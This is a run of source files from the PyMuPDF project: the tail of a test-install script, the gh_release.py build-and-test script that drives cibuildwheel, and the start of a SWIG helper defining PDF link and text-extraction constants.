        run(f'{sudo}rm -r {p}/site-packages/PyMuPDF-*.dist-info || true')
        run(f'{sudo}rm -r {root_prefix}/bin/pymupdf || true')
        if pip == 'venv':
            run(f'{sudo}{venv_name}/bin/python -m installer --destdir {root} --prefix {prefix} {wheel}')
        else:
            run(f'{sudo}{sys.executable} -m installer --destdir {root} --prefix {prefix} {wheel}')
        # It seems that MuPDF Python bindings are installed into
        # `.../dist-packages` (from mupdf:Makefile's call of `$(shell python3
        # -c "import sysconfig; print(sysconfig.get_path('platlib'))")` while
        # `python -m installer` installs PyMuPDF into `.../site-packages`.
        #
        # This might be because `sysconfig.get_path('platlib')` returns
        # `.../site-packages` if run in a venv, otherwise `.../dist-packages`.
        #
        # And on github ubuntu-latest, sysconfig.get_path("platlib") is
        # /opt/hostedtoolcache/Python/3.11.7/x64/lib/python3.11/site-packages
        #
        # So we set pythonpath (used later) to import from all
        # `pythonX.Y/site-packages/` and `pythonX.Y/dist-packages` directories
        # within `root_prefix`:
        #
        pv = platform.python_version().split('.')
        pv = f'python{pv[0]}.{pv[1]}'
        pythonpath = list()
        for dirpath, dirnames, filenames in os.walk(root_prefix):
            if os.path.basename(dirpath) == pv:
                for leaf in 'site-packages', 'dist-packages':
                    if leaf in dirnames:
                        pythonpath.append(os.path.join(dirpath, leaf))
        pythonpath = ':'.join(pythonpath)
        print(f'{pythonpath=}')
    else:
        command = f'{env} pip install -vv --root {root} {os.path.abspath(pymupdf_dir)}'
        run( command)
        # Ask pipcl (in pymupdf_dir) where it installed PyMuPDF.
        sys.path.insert(0, pymupdf_dir)
        import pipcl
        del sys.path[0]
        pythonpath = pipcl.install_dir(root)
    # Show contents of installation directory. This is very slow on github,
    # where /usr/local contains lots of things.
    #run(f'find {root_prefix}|sort')
    # Run pytest tests.
    #
    print('## Run PyMuPDF pytest tests.')
    def run(command):
        # Test-phase commands; skipped (but printed) if --pytest-do 0.
        return run_command(command, doit=pytest_do)
    import gh_release
    if pip == 'venv':
        # Create venv.
        run(f'{sys.executable} -m venv {test_venv}')
        # Install required packages.
        command = f'. {test_venv}/bin/activate'
        command += f' && pip install --upgrade pip'
        command += f' && pip install --upgrade {gh_release.test_packages}'
        run(command)
    elif pip == 'sudo':
        run(f'sudo pip install --upgrade {gh_release.test_packages}')
    else:
        log(f'Not installing packages for testing because {pip=}.')
    # Run pytest.
    #
    # We need to set PYTHONPATH and LD_LIBRARY_PATH. In particular we
    # use pipcl.install_dir() to find where pipcl will have installed
    # PyMuPDF.
    command = ''
    if pip == 'venv':
        command += f'. {test_venv}/bin/activate &&'
    command += f' LD_LIBRARY_PATH={root_prefix}/lib PYTHONPATH={pythonpath} PATH=$PATH:{root_prefix}/bin'
    run(f'ls -l {root_prefix}/bin/')
    # 2024-03-20: Not sure whether/where `pymupdf` binary is installed, so we
    # disable the test_cli* tests.
    command += f' {pymupdf_dir}/scripts/test.py'
    command += f' -v 0'
    if pytest_name is None:
        excluded_tests = (
                'test_color_count',
                'test_3050',
                'test_cli',
                'test_cli_out',
                'test_pylint',
                'test_textbox3',
                'test_3493',
                )
        excluded_tests = ' and not '.join(excluded_tests)
        if not pytest_args:
            pytest_args = ''
        pytest_args += f' -k \'not {excluded_tests}\''
    else:
        command += f' -t {pytest_name}'
    if test_fitz:
        command += f' -f {test_fitz}'
    if test_implementations:
        command += f' -i {test_implementations}'
    if pytest_args:
        command += f' -p {shlex.quote(pytest_args)}'
    if pytest_do:
        command += ' test'
    run(command)
def run_command(command, capture_output=False, check=True, doit=True):
    '''
    Runs `command` in a shell and returns the subprocess.CompletedProcess;
    if `doit` is false we only print what would have been run and return
    None.
    '''
    if not doit:
        print(f'## Would have run: {command}')
        return None
    print(f'## Running: {command}')
    sys.stdout.flush()
    return subprocess.run(command, shell=1, check=check, text=1, capture_output=capture_output)
# Script entry point.
if __name__ == '__main__':
    main()
| 15,829 | Python | .py | 371 | 34.956873 | 115 | 0.602133 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,383 | gh_release.py | pymupdf_PyMuPDF/scripts/gh_release.py | #! /usr/bin/env python3
'''
Build+test script for PyMuPDF using cibuildwheel. Mostly for use with github
builds.
We run cibuildwheel manually, in order to build and test PyMuPDF wheels.
As of 2024-10-08 we also support the old two wheel flavours that make up
PyMuPDF:
PyMuPDFb
Not specific to particular versions of Python. Contains shared
libraries for the MuPDF C and C++ bindings.
PyMuPDF
Specific to particular versions of Python. Contains the rest of
the PyMuPDF implementation.
Args:
build
Build using cibuildwheel.
build-devel
        Build using cibuildwheel with `--platform` set.
pip_install <prefix>
For internal use. Runs `pip install <prefix>-*<platform_tag>.whl`,
where `platform_tag` will be things like 'win32', 'win_amd64',
'x86_64`, depending on the python we are running on.
venv
Run with remaining args inside a venv.
test
Internal.
We also look at specific items in the environment. This allows use with Github
action inputs, which can't be easily translated into command-line arguments.
inputs_flavours
If '0' or unset, build complete PyMuPDF wheels.
If '1', build separate PyMuPDF and PyMuPDFb wheels.
inputs_sdist
inputs_skeleton
Build minimal wheel; for testing only.
inputs_wheels_cps:
Python versions to build for. E.g. 'cp39* cp313*'.
inputs_wheels_default
Default value for other inputs_wheels_* if unset.
inputs_wheels_linux_aarch64
inputs_wheels_linux_auto
inputs_wheels_linux_pyodide
inputs_wheels_macos_arm64
inputs_wheels_macos_auto
inputs_wheels_windows_auto
If '1' we build the relevant wheels.
inputs_PYMUPDF_SETUP_MUPDF_BUILD
Used to directly set PYMUPDF_SETUP_MUPDF_BUILD.
E.g. 'git:--recursive --depth 1 --shallow-submodules --branch master https://github.com/ArtifexSoftware/mupdf.git'
inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE
Used to directly set PYMUPDF_SETUP_MUPDF_BUILD_TYPE. Note that as of
2024-09-10 .github/workflows/build_wheels.yml does not set this.
PYMUPDF_SETUP_PY_LIMITED_API
If not '0' we build a single wheel for all python versions using the
Python Limited API.
Building for Pyodide
If `inputs_wheels_linux_pyodide` is true and we are on Linux, we build a
Pyodide wheel, using scripts/test.py.
Set up for use outside Github
sudo apt install docker.io
sudo usermod -aG docker $USER
Example usage:
PYMUPDF_SETUP_MUPDF_BUILD=../mupdf py -3.9-32 PyMuPDF/scripts/gh_release.py venv build-devel
'''
import glob
import inspect
import os
import platform
import re
import shlex
import subprocess
import sys
import textwrap
import test as test_py
pymupdf_dir = os.path.abspath( f'{__file__}/../..')
def main():
    '''
    Command-line entry point: logs platform/environment diagnostics, then
    processes the command-line arguments in order (defaulting to a single
    `build` command if none are given).
    '''
    log( '### main():')
    log(f'{platform.platform()=}')
    log(f'{platform.python_version()=}')
    log(f'{platform.architecture()=}')
    log(f'{platform.machine()=}')
    log(f'{platform.processor()=}')
    log(f'{platform.release()=}')
    log(f'{platform.system()=}')
    log(f'{platform.version()=}')
    log(f'{platform.uname()=}')
    log(f'{sys.executable=}')
    log(f'{sys.maxsize=}')
    log(f'sys.argv ({len(sys.argv)}):')
    for i, arg in enumerate(sys.argv):
        log(f'    {i}: {arg!r}')
    log(f'os.environ ({len(os.environ)}):')
    for k in sorted( os.environ.keys()):
        v = os.environ[ k]
        log( f'    {k}: {v!r}')
    if test_py.github_workflow_unimportant():
        return
    valgrind = False
    if len( sys.argv) == 1:
        # No args; default to a plain `build`.
        args = iter( ['build'])
    else:
        args = iter( sys.argv[1:])
    while 1:
        try:
            arg = next(args)
        except StopIteration:
            break
        if arg == 'build':
            build(valgrind=valgrind)
        elif arg == 'build-devel':
            # Like `build` but passes an explicit `--platform` to cibuildwheel.
            if platform.system() == 'Linux':
                p = 'linux'
            elif platform.system() == 'Windows':
                p = 'windows'
            elif platform.system() == 'Darwin':
                p = 'macos'
            else:
                assert 0, f'Unrecognised {platform.system()=}'
            build(platform_=p)
        elif arg == 'pip_install':
            # Internal: install the wheel matching <prefix> and our platform.
            prefix = next(args)
            d = os.path.dirname(prefix)
            log( f'{prefix=}')
            log( f'{d=}')
            for leaf in os.listdir(d):
                log( f'    {d}/{leaf}')
            pattern = f'{prefix}-*{platform_tag()}.whl'
            paths = glob.glob( pattern)
            log( f'{pattern=} {paths=}')
            # Follow pipcl.py and look at AUDITWHEEL_PLAT. This allows us to
            # cope if building for both musl and normal linux.
            awp = os.environ.get('AUDITWHEEL_PLAT')
            if awp:
                paths = [i for i in paths if awp in i]
                log(f'After selecting AUDITWHEEL_PLAT={awp!r}, {paths=}.')
            paths = ' '.join( paths)
            run( f'pip install {paths}')
        elif arg == 'venv':
            # Re-run ourselves with all remaining args, inside a venv. Note
            # that this consumes the rest of the shared `args` iterator.
            command = ['python', sys.argv[0]]
            for arg in args:
                command.append( arg)
            venv( command, packages = 'cibuildwheel')
        elif arg == 'test':
            project = next(args)
            package = next(args)
            test( project, package, valgrind=valgrind)
        elif arg == '--valgrind':
            valgrind = int(next(args))
        else:
            assert 0, f'Unrecognised {arg=}'
def build( platform_=None, valgrind=False):
    '''
    Builds (and tests) wheels, and optionally sdists, using cibuildwheel.

    Args:
        platform_:
            None, or 'linux'/'windows'/'macos' to pass `--platform` to
            cibuildwheel.
        valgrind:
            If true, wheel tests run under valgrind (Linux only).

    Most parameters come from `inputs_*` environment variables, because that
    is the only practical way Github workflow .yml files can pass them.
    '''
    log( '### build():')
    platform_arg = f' --platform {platform_}' if platform_ else ''
    # Parameters are in os.environ, as that seems to be the only way that
    # Github workflow .yml files can encode them.
    #
    def get_bool(name, default=0):
        # Reads boolean `name` from the environment; accepts '1'/'true' and
        # '0'/'false'; unset returns `default`; anything else is an error.
        v = os.environ.get(name)
        if v in ('1', 'true'):
            return 1
        elif v in ('0', 'false'):
            return 0
        elif v is None:
            return default
        else:
            assert 0, f'Bad environ {name=} {v=}'
    inputs_flavours = get_bool('inputs_flavours', 1)
    inputs_sdist = get_bool('inputs_sdist')
    inputs_skeleton = os.environ.get('inputs_skeleton')
    inputs_wheels_default = get_bool('inputs_wheels_default', 1)
    inputs_wheels_linux_aarch64 = get_bool('inputs_wheels_linux_aarch64', inputs_wheels_default)
    inputs_wheels_linux_auto = get_bool('inputs_wheels_linux_auto', inputs_wheels_default)
    inputs_wheels_linux_pyodide = get_bool('inputs_wheels_linux_pyodide', 0)
    inputs_wheels_macos_arm64 = get_bool('inputs_wheels_macos_arm64', 0)
    inputs_wheels_macos_auto = get_bool('inputs_wheels_macos_auto', inputs_wheels_default)
    inputs_wheels_windows_auto = get_bool('inputs_wheels_windows_auto', inputs_wheels_default)
    inputs_wheels_cps = os.environ.get('inputs_wheels_cps')
    inputs_PYMUPDF_SETUP_MUPDF_BUILD = os.environ.get('inputs_PYMUPDF_SETUP_MUPDF_BUILD')
    inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE = os.environ.get('inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE')
    PYMUPDF_SETUP_PY_LIMITED_API = os.environ.get('PYMUPDF_SETUP_PY_LIMITED_API')
    log( f'{inputs_flavours=}')
    log( f'{inputs_sdist=}')
    log( f'{inputs_skeleton=}')
    log( f'{inputs_wheels_default=}')
    log( f'{inputs_wheels_linux_aarch64=}')
    log( f'{inputs_wheels_linux_auto=}')
    log( f'{inputs_wheels_linux_pyodide=}')
    log( f'{inputs_wheels_macos_arm64=}')
    log( f'{inputs_wheels_macos_auto=}')
    log( f'{inputs_wheels_windows_auto=}')
    log( f'{inputs_wheels_cps=}')
    log( f'{inputs_PYMUPDF_SETUP_MUPDF_BUILD=}')
    log( f'{inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE=}')
    log( f'{PYMUPDF_SETUP_PY_LIMITED_API=}')
    # Build Pyodide wheel if specified.
    #
    if platform.system() == 'Linux' and inputs_wheels_linux_pyodide:
        # Pyodide wheels are built by running scripts/test.py, not
        # cibuildwheel.
        command = f'{sys.executable} scripts/test.py'
        if inputs_PYMUPDF_SETUP_MUPDF_BUILD:
            command += f' -m {shlex.quote(inputs_PYMUPDF_SETUP_MUPDF_BUILD)}'
        command += ' pyodide_wheel'
        run(command)
    # Build sdist(s).
    #
    if inputs_sdist:
        if pymupdf_dir != os.path.abspath( os.getcwd()):
            log( f'Changing dir to {pymupdf_dir=}')
            os.chdir( pymupdf_dir)
        # Create PyMuPDF sdist.
        run(f'{sys.executable} setup.py sdist')
        assert glob.glob('dist/PyMuPDF-*.tar.gz')
        if inputs_flavours:
            # Create PyMuPDFb sdist.
            run(
                    f'{sys.executable} setup.py sdist',
                    env_extra=dict(PYMUPDF_SETUP_FLAVOUR='b'),
                    )
            assert glob.glob('dist/PyMuPDFb-*.tar.gz')
    # Build wheels.
    #
    if (0
            or inputs_wheels_linux_aarch64
            or inputs_wheels_linux_auto
            or inputs_wheels_macos_arm64
            or inputs_wheels_macos_auto
            or inputs_wheels_windows_auto
            ):
        # NOTE(review): if none of the above flags are set, the code below
        # this block still runs and references `env_extra`, which is only
        # defined here - confirm that cannot happen in practice.
        env_extra = dict()
        def set_if_unset(name, value):
            # Sets `name` in env_extra only if the caller's environment does
            # not already define it.
            v = os.environ.get(name)
            if v is None:
                log( f'Setting environment {name=} to {value=}')
                env_extra[ name] = value
            else:
                log( f'Not changing {name}={v!r} to {value!r}')
        set_if_unset( 'CIBW_BUILD_VERBOSITY', '1')
        # We exclude pp* because of `fitz_wrap.obj : error LNK2001: unresolved
        # external symbol PyUnicode_DecodeRawUnicodeEscape`.
        # 2024-06-05: musllinux on aarch64 fails because libclang cannot find
        # libclang.so.
        #
        # Note that we had to disable cp313-win32 when 3.13 was experimental
        # because there was no 64-bit Python-3.13 available via `py
        # -3.13`. (Win32 builds need to use win64 Python because win32
        # libclang is broken.)
        #
        set_if_unset( 'CIBW_SKIP', 'pp* *i686 cp36* cp37* *musllinux*aarch64*')
        def make_string(*items):
            # Joins non-empty items with single spaces.
            ret = list()
            for item in items:
                if item:
                    ret.append(item)
            return ' '.join(ret)
        # Each selector must end with '*' so it matches cibuildwheel build
        # identifiers such as 'cp313-manylinux_x86_64'. [Previously the last
        # default entry was a bare 'cp313', which matched no build identifier
        # and also failed the `assert m` in the loop below, whose regex
        # requires a literal '*'.]
        cps = inputs_wheels_cps if inputs_wheels_cps else 'cp39* cp310* cp311* cp312* cp313*'
        set_if_unset( 'CIBW_BUILD', cps)
        for cp in cps.split():
            m = re.match('cp([0-9]+)[*]', cp)
            assert m
            v = int(m.group(1))
            if v == 314:
                # Need to set CIBW_PRERELEASE_PYTHONS, otherwise cibuildwheel
                # will refuse.
                log(f'Setting CIBW_PRERELEASE_PYTHONS for Python version {cp=}.')
                set_if_unset( 'CIBW_PRERELEASE_PYTHONS', '1')
        if platform.system() == 'Linux':
            set_if_unset(
                    'CIBW_ARCHS_LINUX',
                    make_string(
                        'auto64' * inputs_wheels_linux_auto,
                        'aarch64' * inputs_wheels_linux_aarch64,
                        ),
                    )
            if env_extra.get('CIBW_ARCHS_LINUX') == '':
                log(f'Not running cibuildwheel because CIBW_ARCHS_LINUX is empty string.')
                return
        if platform.system() == 'Windows':
            set_if_unset(
                    'CIBW_ARCHS_WINDOWS',
                    make_string(
                        'auto' * inputs_wheels_windows_auto,
                        ),
                    )
            if env_extra.get('CIBW_ARCHS_WINDOWS') == '':
                log(f'Not running cibuildwheel because CIBW_ARCHS_WINDOWS is empty string.')
                return
        if platform.system() == 'Darwin':
            set_if_unset(
                    'CIBW_ARCHS_MACOS',
                    make_string(
                        'auto' * inputs_wheels_macos_auto,
                        'arm64' * inputs_wheels_macos_arm64,
                        ),
                    )
            if env_extra.get('CIBW_ARCHS_MACOS') == '':
                log(f'Not running cibuildwheel because CIBW_ARCHS_MACOS is empty string.')
                return
    def env_pass(name):
        '''
        Adds `name` to CIBW_ENVIRONMENT_PASS_LINUX if required to be available
        when building wheel with cibuildwheel.
        '''
        if platform.system() == 'Linux':
            v = env_extra.get('CIBW_ENVIRONMENT_PASS_LINUX', '')
            if v:
                v += ' '
            v += name
            env_extra['CIBW_ENVIRONMENT_PASS_LINUX'] = v
    def env_set(name, value, pass_=False):
        # Sets `name` in env_extra; if `pass_` is true, also arranges for it
        # to be passed into cibuildwheel's Linux containers.
        assert isinstance( value, str)
        if not name.startswith('CIBW'):
            assert pass_, f'Non-CIBW* name requires `pass_` to be true. {name=} {value=}.'
        env_extra[ name] = value
        if pass_:
            env_pass(name)
    if os.environ.get('PYMUPDF_SETUP_LIBCLANG'):
        env_pass('PYMUPDF_SETUP_LIBCLANG')
    if inputs_skeleton:
        env_set('PYMUPDF_SETUP_SKELETON', inputs_skeleton, pass_=1)
    if inputs_PYMUPDF_SETUP_MUPDF_BUILD not in ('-', None):
        log(f'Setting PYMUPDF_SETUP_MUPDF_BUILD to {inputs_PYMUPDF_SETUP_MUPDF_BUILD!r}.')
        env_set('PYMUPDF_SETUP_MUPDF_BUILD', inputs_PYMUPDF_SETUP_MUPDF_BUILD, pass_=True)
        env_set('PYMUPDF_SETUP_MUPDF_TGZ', '', pass_=True)  # Don't put mupdf in sdist.
    if inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE not in ('-', None):
        log(f'Setting PYMUPDF_SETUP_MUPDF_BUILD_TYPE to {inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE!r}.')
        env_set('PYMUPDF_SETUP_MUPDF_BUILD_TYPE', inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE, pass_=True)
    def set_cibuild_test():
        # Makes cibuildwheel test each wheel by re-running this script with
        # the `test` arg.
        log( f'set_cibuild_test(): {inputs_skeleton=}')
        valgrind_text = ''
        if valgrind:
            valgrind_text = ' --valgrind 1'
        env_set('CIBW_TEST_COMMAND', f'python {{project}}/scripts/gh_release.py{valgrind_text} test {{project}} {{package}}')
    if pymupdf_dir != os.path.abspath( os.getcwd()):
        log( f'Changing dir to {pymupdf_dir=}')
        os.chdir( pymupdf_dir)
    run('pip install cibuildwheel')
    # We include MuPDF build-time files.
    flavour_d = True
    if PYMUPDF_SETUP_PY_LIMITED_API != '0':
        # Build one wheel with oldest python, then fake build with other python
        # versions so we test everything.
        log(f'{PYMUPDF_SETUP_PY_LIMITED_API=}')
        env_pass('PYMUPDF_SETUP_PY_LIMITED_API')
        CIBW_BUILD_old = env_extra.get('CIBW_BUILD')
        assert CIBW_BUILD_old is not None
        env_set('CIBW_BUILD', 'cp39*')
        log(f'Building single wheel.')
        run( f'cibuildwheel{platform_arg}', env_extra=env_extra)
        # Fake-build with all python versions, using the wheel we have
        # just created. This works by setting PYMUPDF_SETUP_URL_WHEEL
        # which makes PyMuPDF's setup.py copy an existing wheel instead
        # of building a wheel itself; it also copes with existing
        # wheels having extra platform tags (from cibuildwheel's use of
        # auditwheel).
        #
        env_set('PYMUPDF_SETUP_URL_WHEEL', f'file://wheelhouse/', pass_=True)
        set_cibuild_test()
        env_set('CIBW_BUILD', CIBW_BUILD_old)
        # Disable cibuildwheels use of auditwheel. The wheel was repaired
        # when it was created above so we don't need to do so again. This
        # also avoids problems with musl wheels on a Linux glibc host where
        # auditwheel fails with: `ValueError: Cannot repair wheel, because
        # required library "libgcc_s-a3a07607.so.1" could not be located`.
        #
        env_set('CIBW_REPAIR_WHEEL_COMMAND', '')
        log(f'Testing on all python versions using wheels in wheelhouse/.')
        run( f'cibuildwheel{platform_arg}', env_extra=env_extra)
    elif inputs_flavours:
        # Build and test PyMuPDF and PyMuPDFb wheels.
        #
        # First build PyMuPDFb wheel. cibuildwheel will build a single wheel
        # here, which will work with any python version on current OS.
        #
        flavour = 'b'
        if flavour_d:
            # Include MuPDF build-time files.
            flavour += 'd'
        env_set( 'PYMUPDF_SETUP_FLAVOUR', flavour, pass_=1)
        run( f'cibuildwheel{platform_arg}', env_extra)
        # [Previously this was a non-f-string, so it echoed the literal text
        # '{flavour=}'.]
        run( f'echo after {flavour=}')
        run( 'ls -l wheelhouse')
        # Now set environment to build PyMuPDF wheels. cibuildwheel will build
        # one for each Python version.
        #
        # Tell cibuildwheel not to use `auditwheel`, because it cannot cope
        # with us deliberately putting required libraries into a different
        # wheel.
        #
        # Also, `auditwheel addtag` says `No tags to be added` and terminates
        # with non-zero. See: https://github.com/pypa/auditwheel/issues/439.
        #
        env_set('CIBW_REPAIR_WHEEL_COMMAND_LINUX', '')
        env_set('CIBW_REPAIR_WHEEL_COMMAND_MACOS', '')
        # We tell cibuildwheel to test these wheels, but also set
        # CIBW_BEFORE_TEST to make it first run ourselves with the
        # `pip_install` arg to install the PyMuPDFb wheel. Otherwise
        # installation of PyMuPDF would fail because it lists the
        # PyMuPDFb wheel as a prerequisite. We need to use `pip_install`
        # because wildcards do not work on Windows, and we want to be
        # careful to avoid incompatible wheels, e.g. 32 vs 64-bit wheels
        # coexist during Windows builds.
        #
        env_set('CIBW_BEFORE_TEST', f'python scripts/gh_release.py pip_install wheelhouse/PyMuPDFb')
        set_cibuild_test()
        # Build main PyMuPDF wheel.
        flavour = 'p'
        env_set( 'PYMUPDF_SETUP_FLAVOUR', flavour, pass_=1)
        run( f'cibuildwheel{platform_arg}', env_extra=env_extra)
    else:
        # Build and test wheels which contain everything.
        #
        flavour = 'pb'
        if flavour_d:
            flavour += 'd'
        set_cibuild_test()
        env_set( 'PYMUPDF_SETUP_FLAVOUR', flavour, pass_=1)
        run( f'cibuildwheel{platform_arg}', env_extra=env_extra)
    run( 'ls -lt wheelhouse')
def cpu_bits():
    '''
    Returns 32 or 64 depending on whether we are running 32- or 64-bit
    Python (determined from sys.maxsize).
    '''
    if sys.maxsize == 2**31 - 1:
        return 32
    return 64
# Name of venv used by `venv()`.
#
venv_name = f'venv-pymupdf-{platform.python_version()}-{cpu_bits()}'
def venv( command=None, packages=None, quick=False, system_site_packages=False):
    '''
    Runs remaining args, or the specified command if present, in a venv.

    command:
        Command as string or list of args. Should usually start with 'python'
        to run the venv's python.
    packages:
        List of packages (or comma-separated string) to install.
    quick:
        If true and venv directory already exists, we don't recreate venv or
        install Python packages in it.
    '''
    if platform.system() == 'OpenBSD':
        # libclang is not available from pypi.org on OpenBSD, so we must use
        # the system py3-llvm package via --system-site-packages.
        system_site_packages = True
        log(f'OpenBSD: libclang not available from pypi.org.')
        log(f'OpenBSD: system package `py3-llvm` must be installed.')
        log(f'OpenBSD: creating venv with --system-site-packages.')
        log(f'OpenBSD: `pip install .../PyMuPDF` must be preceded by install of swig etc.')
    site_flag = ' --system-site-packages' if system_site_packages else ''
    # Only reuse an existing venv when `quick` was requested and the venv
    # directory is actually present.
    reuse = quick and os.path.isdir(venv_name)
    if reuse:
        log(f'{quick=}: Not creating venv because directory already exists: {venv_name}')
        cmd = 'true'
    else:
        quick = False
        cmd = f'{sys.executable} -m venv{site_flag} {venv_name}'
    if platform.system() == 'Windows':
        cmd += f' && {venv_name}\\Scripts\\activate'
    else:
        cmd += f' && . {venv_name}/bin/activate'
    if reuse:
        log(f'{quick=}: Not upgrading pip or installing packages.')
    else:
        cmd += ' && python -m pip install --upgrade pip'
        if packages:
            if isinstance(packages, str):
                packages = packages.split(',')
            cmd += ' && pip install ' + ' '.join(packages)
    cmd += ' &&'
    if isinstance( command, str):
        cmd += ' ' + command
    else:
        for arg in command:
            cmd += ' ' + shlex.quote(arg)
    run( cmd)
def test( project, package, valgrind):
    '''
    Installs test prerequisites then runs PyMuPDF's pytest suite via
    tests/run_compound.py; if `valgrind` is true the tests run under
    valgrind with leak errors disabled.
    '''
    run(f'pip install {test_packages}')
    if not valgrind:
        run(f'{sys.executable} {project}/tests/run_compound.py pytest {project}/tests')
        return
    log('Installing valgrind.')
    run(f'sudo apt update')
    run(f'sudo apt install valgrind')
    run(f'valgrind --version')
    log('Running PyMuPDF tests under valgrind.')
    # Memory leaks are ignored (--errors-for-leak-kinds=none).
    vg_command = (
            f'{sys.executable} {project}/tests/run_compound.py'
            f' valgrind --suppressions={project}/valgrind.supp --error-exitcode=100 --errors-for-leak-kinds=none --fullpath-after='
            f' pytest {project}/tests'
            )
    run(
            vg_command,
            env_extra=dict(
                PYTHONMALLOC='malloc',
                PYMUPDF_RUNNING_ON_VALGRIND='1',
                ),
            )
if platform.system() != 'Windows':
    def relpath(path, start=None):
        '''Like os.path.relpath().'''
        return os.path.relpath(path, start)
else:
    def relpath(path, start=None):
        '''
        Like os.path.relpath(), except that we fall back to the absolute
        path when `path` and `start` are on different drives (where
        os.path.relpath() raises ValueError).
        '''
        try:
            return os.path.relpath(path, start)
        except ValueError:
            return os.path.abspath(path)
def log(text, caller=0):
    '''
    Writes `text` to stdout with prefix showing caller path relative to
    pymupdf_dir and fn name.

    Args:
        text:
            Text to print; with multi-line text every line gets the prefix.
        caller:
            Number of extra stack frames to skip; 0 means our direct caller.
    '''
    # NOTE(review): frame index `caller+1` assumes this exact call depth -
    # do not wrap the stack inspection in another helper.
    frame_record = inspect.stack( context=0)[ caller+1]
    filename = frame_record.filename
    line = frame_record.lineno
    function = frame_record.function
    # `pymupdf_dir` is a module-level global defined elsewhere in this file.
    prefix = f'{relpath(filename, pymupdf_dir)}:{line}:{function}(): '
    print(textwrap.indent(text, prefix), flush=1)
def run(command, env_extra=None, check=1, timeout=None):
    '''
    Runs a command using subprocess.run(), logging it first.

    Args:
        command:
            The command to run (passed through a shell).
        env_extra:
            None or dict of extra environment variables merged on top of
            os.environ.
        check:
            Whether to raise an exception if the command fails.
        timeout:
            If not None, timeout in seconds; passed directly to
            subprocess.run(). Note that on MacOS subprocess.run() seems to
            leave processes running if timeout expires.
    '''
    env = None
    parts = ['Running: ']
    if env_extra:
        env = os.environ.copy()
        env.update(env_extra)
        parts.append('\n[environment:\n')
        for name, value in env_extra.items():
            parts.append(f'    {name}={shlex.quote(value)}\n')
        parts.append(']\n')
    parts.append(f'{command}')
    log(''.join(parts), caller=1)
    return subprocess.run(command, check=check, shell=1, env=env, timeout=timeout)
def platform_tag():
    '''Returns the wheel platform tag for the current OS/CPU combination.'''
    system = platform.system()
    bits = cpu_bits()
    if system == 'Windows':
        return 'win32' if bits == 32 else 'win_amd64'
    if system in ('Linux', 'Darwin'):
        # Only 64-bit builds are supported here; tag is the machine name.
        assert bits == 64
        return platform.machine()
    assert 0, f'Unrecognised: {platform.system()=}'
# Packages pip-installed into test venvs; extended below where wheels exist.
test_packages = 'pytest fontTools pymupdf-fonts flake8 pylint codespell'
if platform.system() == 'Windows' and cpu_bits() == 32:
    # No pillow wheel available, and doesn't build easily.
    pass
else:
    test_packages += ' pillow'
if platform.system().startswith('MSYS_NT-'):
    # psutil not available on msys2.
    pass
else:
    test_packages += ' psutil'
if __name__ == '__main__':
    main()
| 24,505 | Python | .py | 565 | 33.076106 | 139 | 0.591227 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,384 | helper-python.i | pymupdf_PyMuPDF/src_classic/helper-python.i | %pythoncode %{
# ------------------------------------------------------------------------
# Copyright 2020-2022, Harald Lieder, mailto:harald.lieder@outlook.com
# License: GNU AFFERO GPL 3.0, https://www.gnu.org/licenses/agpl-3.0.html
#
# Part of "PyMuPDF", a Python binding for "MuPDF" (http://mupdf.com), a
# lightweight PDF, XPS, and E-book viewer, renderer and toolkit which is
# maintained and developed by Artifex Software, Inc. https://artifex.com.
# ------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# Various PDF Optional Content Flags
# ------------------------------------------------------------------------------
PDF_OC_ON = 0
PDF_OC_TOGGLE = 1
PDF_OC_OFF = 2
# ------------------------------------------------------------------------------
# link kinds and link flags
# ------------------------------------------------------------------------------
LINK_NONE = 0
LINK_GOTO = 1
LINK_URI = 2
LINK_LAUNCH = 3
LINK_NAMED = 4
LINK_GOTOR = 5
LINK_FLAG_L_VALID = 1
LINK_FLAG_T_VALID = 2
LINK_FLAG_R_VALID = 4
LINK_FLAG_B_VALID = 8
LINK_FLAG_FIT_H = 16
LINK_FLAG_FIT_V = 32
LINK_FLAG_R_IS_ZOOM = 64
# ------------------------------------------------------------------------------
# Text handling flags
# ------------------------------------------------------------------------------
TEXT_ALIGN_LEFT = 0
TEXT_ALIGN_CENTER = 1
TEXT_ALIGN_RIGHT = 2
TEXT_ALIGN_JUSTIFY = 3
TEXT_OUTPUT_TEXT = 0
TEXT_OUTPUT_HTML = 1
TEXT_OUTPUT_JSON = 2
TEXT_OUTPUT_XML = 3
TEXT_OUTPUT_XHTML = 4
TEXT_PRESERVE_LIGATURES = 1
TEXT_PRESERVE_WHITESPACE = 2
TEXT_PRESERVE_IMAGES = 4
TEXT_INHIBIT_SPACES = 8
TEXT_DEHYPHENATE = 16
TEXT_PRESERVE_SPANS = 32
TEXT_MEDIABOX_CLIP = 64
TEXT_CID_FOR_UNKNOWN_UNICODE = 128
TEXTFLAGS_WORDS = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_BLOCKS = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_DICT = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_PRESERVE_IMAGES
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_RAWDICT = TEXTFLAGS_DICT
TEXTFLAGS_SEARCH = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_DEHYPHENATE
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_HTML = (0
